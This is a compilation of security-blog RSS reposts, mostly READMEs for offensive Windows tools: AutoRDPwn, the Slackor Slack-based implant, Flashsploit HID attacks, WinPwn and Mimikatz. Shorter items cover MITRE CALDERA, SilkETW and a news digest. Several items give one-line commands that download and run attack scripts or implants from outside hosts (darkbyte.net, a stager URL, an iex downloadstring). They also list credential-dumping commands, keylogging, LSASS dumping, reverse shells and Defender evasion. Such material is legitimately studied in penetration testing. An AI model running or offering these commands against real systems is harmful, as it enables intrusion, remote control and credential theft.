AutoRDPwn v5.0 – The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on-demand, using tools native to the operating system itself.Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.RequirementsPowershell 4.0 or higherChangesVersion 5.0• New logo completely redesigned from scratch• Full translation in 7 languages: es, en, fr, de, it, ru, pt• Remote execution through a reverse shell with UAC and AMSI Bypass• Partial support from Linux (more information in the user guide)• Improved remote execution (internet connection is no longer necessary on the victim)• New section available: Backdoors and persistence• New module available: Remote Keylogger• New section available: Privilege escalation• New module available: Obtain information from the operating system• New module available: Search vulnerabilities with Sherlock• New module available: Escalate privileges with PowerUp• New section available: Other Modules• New module available: Execute an external script*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between teams.When used remotely in a reverse shell, it is necessary to use the following parameters:-admin / -noadmin -> Depending on the permissions we have, we will use one or the other-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)-option -> As with the menu, we can choose how to launch the attack-shadow -> We will decide if we want to see or control the remote device-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machineLocal execution on one line:powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"Example of remote execution on a line:powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and AcknowledgmentsThis framework uses the following scripts and tools:• Chachi-Enumerator of Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools• Get-System from HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell• Invoke-DCOM of Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts• Invoke-MetasploitPayload of Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload• Invoke-Phant0m of Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m• Invoke-PowerShellTcp of Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash• Mimikatz from Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz• PsExec from Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• RDP Wrapper of Stas’M Corp. -> https://github.com/stascorp/rdpwrap• SessionGopher of Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopherAnd many more, that do not fit here .. Thanks to all of them and their excellent work.ContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html

UPDATE: MITRE CALDERA 2.2.0

PenTestIT RSS Feed
If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools.  Sometime back, an update – the MITRE CALDERA 2.2.0 was released. A lot of changes have been made to create this updated version and as always, this version discusses the different updates made toRead more about UPDATE: MITRE CALDERA 2.2.0
The post UPDATE: MITRE CALDERA 2.2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-2-0/

Slackor – A Golang Implant That Uses Slack As A Command And Control Server

A Golang implant that uses Slack as a command and control channel.This project was inspired by Gcat and Twittor.This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps.SetupNote: The server is written in Python 3For this to work you need: A Slack Workspace Register an app with the following permissions: channels:readchannels:historychannels:writefiles:write:userfiles:read Create a bot This repo contains five files:install.sh Installs dependanciessetup.py The script to create the slack channels, database, and implantserver.py The Slackor server, designed to be ran on Linuxtemplate.go Template for the generated implantrequirements.txt Python dependencies (installed automatically)To get started:Run install.shRun setup.py Supply the OAuth Access Token and Bot User OAuth Access Token from your appAfter running the script successfully, a file agent.exe will be created. It will be a 64bit Go binary packed with UPX.After starting server.py on a Linux host, execute agent.exe on your target Windows host.Run the “stager" module to generate a one-liner and other droppers.powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exeThis will execute InvokeWebRequest(PS v.3+) to download the payload, execute it using a LOLBin, and then delete itself once killed. This is a working example but the command can tweaked to use another download method or execution method.UsageType "help" or press [TAB] to see a list of available commands. type "help [COMMAND]" to see a description of that command.(Slackor)Help – Displays help menuinteract – Interact with an agentlist – List all registered agentsremove – kill and remove an agentrevive – Sends a signal to all agents to re-register with the serverstager – Generates a one-liner to download an execute the implantquit – Quit the programwipefiles – Deletes all uploaded files out of SlackOnce an agent checks in, you can interact with it. Use "interact [AGENT] to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands.(Slackor:AGENT)back – Return to the main menubeacon – change the amount of time between each check-in by an agent (default is 5 seconds)bypassuac – Attempts to spawn a high integrity agentcleanup – Removes persistence artifactsclipboard – Retreives the contents of the clipboarddefanger – Attempts to de-fang Windows Defenderdownload – Download a file from the agent to the Slackor serverduplicate – Causes the agent to spawn another invocation of itselfgetsystem – Spawns an agent as NTAUTHORITY/SYSTEMhelp – Displays help menukeyscan – Starts a keylogger on the agentkill – Kill the agentminidump – Dumps memory from lsass.exe and downloads itpersist – Creates persistence by implanting a binary in an ADSsamdump – Attempts to dump the SAM file for offline hash extractionscreenshot – Takes a screenshot of the desktop and retrieves itshellcode – Executes x64 raw shellcodesleep – Cause the agent to sleep once (enter time in seconds)sysinfo – Displays the current user, OS version, system architecture, and number of CPU coresupload – Upload a file to the agent from the Slackor serverwget – Pull down arbitrary files over HTTP/HTTPSOPSEC ConsiderationsCommand output and downloaded files are AES encrypted in addition to TLS transport encryption.Modules will warn you before performing tasks that write to disk.When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe:cat – prints file contentcd – change directoryhostname – Displays the name of the hostifconfig – Displays interface informationls – list directory contentsmkdir – Creates a directorypwd – prints the current working directoryrm – removes a filermdir – removes a directorywhoami / getuid – prints the current userCreditshttps://github.com/EgeBalci – Functions adapted from HERCULES and EGESPLOIThttps://github.com/SaturnsVoid – Keylogger adapted from GoBot2https://github.com/vyrus001 – x64 shellcode execution shellGoCrypto functions adopted from https://www.golang123.com/topic/1686Persistence idea from Enigma0x3Minidump adoped from Merlin, credit to C-StoScreenshot code from kbinaniClipboard code from atottoStager generator from hlldzUAC bypass by winscripting.blogLulzbin find by @vector_secCountless threads on StackOverflowThanks to impacket for dumping hashes from SAM/SYS/SECURITY reg hives.LSASS dump credential extraction made possbile using pypykatz by skelsecFuture goalsDOSfuscationReflectively load DLL/PE – https://github.com/vyrus001/go-mimikatzExecute C# assemblies in memory – https://github.com/lesnuages/go-execute-assemblySource code obfuscation https://github.com/unixpickle/gobfuscateFAQ:Is this safe to use for red teams/pentesting?Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.What about Mimikatz?The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:(Slackor: AGENT)minidumpTHis will automically extract passwords with Pypykatz. Alternatively, you can use Mimikatz on Windows.>mimikatz.exemimikatz # sekurlsa::Minidump lsassdump.dmpmimikatz # sekurlsa::logonPasswordsIs it cross-platform?Not yet. It has not been fully tested on a variety of systems. The server was designed to run on Kali Linux and the agent on Windows 10.How well does it scale?Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.Is it vulnerable to standard beacon analysis?Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are recieved.Why did you do [x] when a better way to do it is [y]?I tried my best. PRs are encouraged :)It gets caught by AV!The built-in HTA stager is created by SpookFlare which is based on Demiguise. If you want your droppers to not get snagged you probably want to go custom. The built in droppers are just there to get you started.Download Slackor

Link: http://feedproxy.google.com/~r/PentestTools/~3/SzRtcRYVjzE/slackor-golang-implant-that-uses-slack.html

Flashsploit – Exploitation Framework For ATtiny85 Based HID Attacks

Flashsploit is an Exploitation Framework for Attacks using ATtiny85 HID Devices such as Digispark USB Development Board, flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in Metasploit-Framework if Required by the Script, in Summary : Automatic Script Generation with Automated msfconsole.FeaturesTODO : Add Linux and OSX ScriptsWindowsData ExfiltrationExtract all WiFi Passwords and Uploads an XML to SFTP Server:Extract Network Configuration Information of Target System and Uploads to SFTP Server:Extract Passwords and Other Critical Information using Mimikatz and Uploads to SFTP Server:Reverse ShellsGet Reverse Shell by Abusing Microsoft HTML Apps (mshta):Get Reverse Shell by Abusing Certification Authority Utility (certutil)Get Reverse Shell by Abusing Windows Script Host (csript)Get Reverse Shell by Abusing Windows Installer (msiexec)Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)MiscellaneousChange Wallpaper of Target Machine:Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage)Drop and Execute a File of your Choice, a ransomware maybe? ;)Disable Windows Defender Service on Target MachineTested onKali Linux 2019.2BlackArch LinuxDependenciesFlashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS :Metasploit-FrameworkPython 3SFTPPHPIf you think I should still make an Install Script, Open an issue.Usagegit clone https://github.com/thewhiteh4t/flashsploit.git cd flashsploitpython3 flashsploit.py Download Flashsploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/lPG04RLt5rk/flashsploit-exploitation-framework-for.html

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in thisRead more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW, it is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications it is primarily a research tool in it’s current state.For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.Implementation DetailsLibrariesSilkETW is buit on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.ModuleId Version LicenseUrl ——– ——- ———- McMaster.Extensions.CommandLineUtils 2.3.2 https://licenses.nuget.org/Apache-2.0 Microsoft.Diagnostics.Tracing.TraceEvent 2.0.36 https://github.com/Microsoft/perfview/blob/master/LICENSE.TXTNewtonsoft.Json 12.0.1 https://licenses.nuget.org/MIT System.ValueTuple 4.4.0 https://github.com/dotnet/corefx/blob/master/LICENSE.TXT YaraSharp 1.3.1 https://github.com/stellarbear/YaraSharp/blob/master/LICENSECommand Line OptionsCommand line usage is fairly straight forward and user input is validated in the execution prologue. See the image below for further details.JSON Output StructureThe JSON output, prior to serialization, is formatted according to the following C# struct.public struct EventRecordStruct{ public Guid ProviderGuid; public List YaraMatch; public string ProviderName; public string EventName; public TraceEventOpcode Opcode; public string OpcodeName; public DateTime TimeStamp; public int ThreadID; public int ProcessID; public string ProcessName; public int PointerSize; public int EventDataLength; public Hashtable XmlEventData;}Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for “Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".{ "ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716", "YaraMatch":[ ], "ProviderName":"Microsoft-Windows-Kernel-Process", "EventName":"ThreadStop/Stop", "Opcode":2, "OpcodeName":"Stop", "TimeStamp":"2019-03-03T17:58:14.2862348+00:00", "ThreadID":11996, "ProcessID":8416, "ProcessName":"", "PointerSize":8, "EventDataLength":76, "XmlEventData":{ "FormattedMessage":"Thread 11,996 (in Process 8,416) stopped. ", "StartAddr":"0x7fffe299a110", "ThreadID":"11,996", "UserStackLimit":"0x3d632000", "StackLimit":"0xfffff38632d39000", "MSec":"560.5709", "TebBase":"0x91c000", "CycleTime":"4,266,270", "ProcessID":"8,416", "PID":"8416", "StackBase":"0xfffff38632d40000", "SubProcessTag":"0", "TID":"11996", "ProviderName":"Microsoft-Windows-Kern el-Process", "PName":"", "UserStackBase":"0x3d640000", "EventName":"ThreadStop/Stop", "Win32StartAddr":"0x7fffe299a110" }}UsageFilter data in PowerShellYou can import JSON output from SilkETW in PowerShell using the following simple function.function Get-SilkData { param($Path) $JSONObject = @() Get-Content $Path | ForEach-Object { $JSONObject += $_ | ConvertFrom-Json } $JSONObject}In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.jsonWith data in hand it is easy to sort, grep and filter for the properties we are interested in.YaraSilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike’s execute-assembly.rule Seatbelt_GetTokenInformation{ strings: $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/ $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase condition: all of ($s*)}We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.jsonWe can see at runtime that our Yara rule was hit.Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.ChangelogFor details on version specific changes, please refer to the Changelog.Download SilkETW

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

Mimikatz v2.2.0 – A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.But that’s not all! Crypto, Terminal Server, Events, … lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).If you don’t want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releasesQuick usagelogprivilege::debugsekurlsasekurlsa::logonpasswordssekurlsa::tickets /exportsekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmdkerberoskerberos::list /exportkerberos::ptt c:\chocolate.kirbikerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbicryptocrypto::capicrypto::cngcrypto::certificates /exportcrypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINEcrypto::keys /exportcrypto::keys /machine /exportvault & lsadumpvault::credvault::listtoken::elevatevault::credvault::listlsadump::samlsadump::secretslsadump::cachetoken::revertlsadump::dcsync /user:domain\krbtgt /domain:lab.localBuildmimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)Synchronize!GIT URL is : https://github.com/gentilkiwi/mimikatz.gitSVN URL is : https://github.com/gentilkiwi/mimikatz/trunkZIP file is : https://github.com/gentilkiwi/mimikatz/archive/master.zipBuild the solutionAfter opening the solution, Build / Build Solution (you can change architecture)mimikatz is now built and ready to be used! (Win32 / x64)you can have error MSB3073 about _build_.cmd and mimidrv, it’s because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.ddk2003With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.Follow instructions:http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systemehttp://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheaderLicenceCC BY 4.0 licence – https://creativecommons.org/licenses/by/4.0/mimikatz needs coffee to be developed:ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5PayPal: https://www.paypal.me/delpy/AuthorBenjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )DCSync function in lsadump module was co-writed with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )This is a personal development, please respect its philosophy and don’t use it for bad things!Download Mimikatz

Link: http://www.kitploit.com/2019/04/mimikatz-v220-post-exploitation-tool-to.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on well-known large other offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.Yes it is not a C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.Different local recon modules, domain recon modules, pivilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!Just Import the Modules with “Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1’)Functions available after Import: WinPwn -> Guides the user through all functions/Modules with simple questions. Inveigh -> Executes Inveigh in a new Console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with Session management afterwards sessionGopher -> Executes Sessiongopher and Asking for parameters (https://github.com/Arvanaghi/SessionGopher) Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit) localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS) JAWS -> Just another Windows Privilege Escalation script gets executed domainreconmodules -> Different Powerview situal awareness functions get executed and the output stored on disk. In Addition a Userlist for DomainpasswordSpray gets stored on disk. An AD-Report is generated in CSV Files (or XLS if excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray) Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump) lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne) latmov -> Searches for Systems with Admin-Access in the domain for lateral movement. Mass-Mimikatz can be used after for the found systems. Domainpassword-Spray for new Credentials can also be used here. empirelauncher -> Launch powershell empire oneliner on remote Systems (https://github.com/EmpireProject/Empire) shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit) groupsearch -> Get-DomainGPOUserLocalGroupMapping – find Systems where you have Admin-access or RDP access to via Group Policy Mapping (Powerview / Powersploit) Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking isadmin -> Checks for local admin access on the local system Sharphound -> Downloads Sharphound and collects Information for the Bloodhound DB adidnswildcard -> Create a Active Directory-Integrated DNS Wildcard Record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard) The "oBEJHzXyARrq.exe"-Executable is an obfuscated Version of jaredhaights PSAttack Tool for Applocker/PS-Restriction Bypass (https://github.com/jaredhaight/PSAttack).Todo:Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.Proxy Options via PAC-File are not correctly found in the moment.Legal disclaimer:Usage of WinPwn for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206

    This week, RDP Servers Can Hack Client Devices, Roughly 500,000 Ubiquiti devices may be affected by a flaw already exploited in the wild, Crypto exchange in limbo after the founder dies with password, Home DNA kit company says its working with the FBI, Outlaw Shellbot infects Linux servers to mine for Monero, Apple’s […]
The post RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/6ydFfgEPIFk/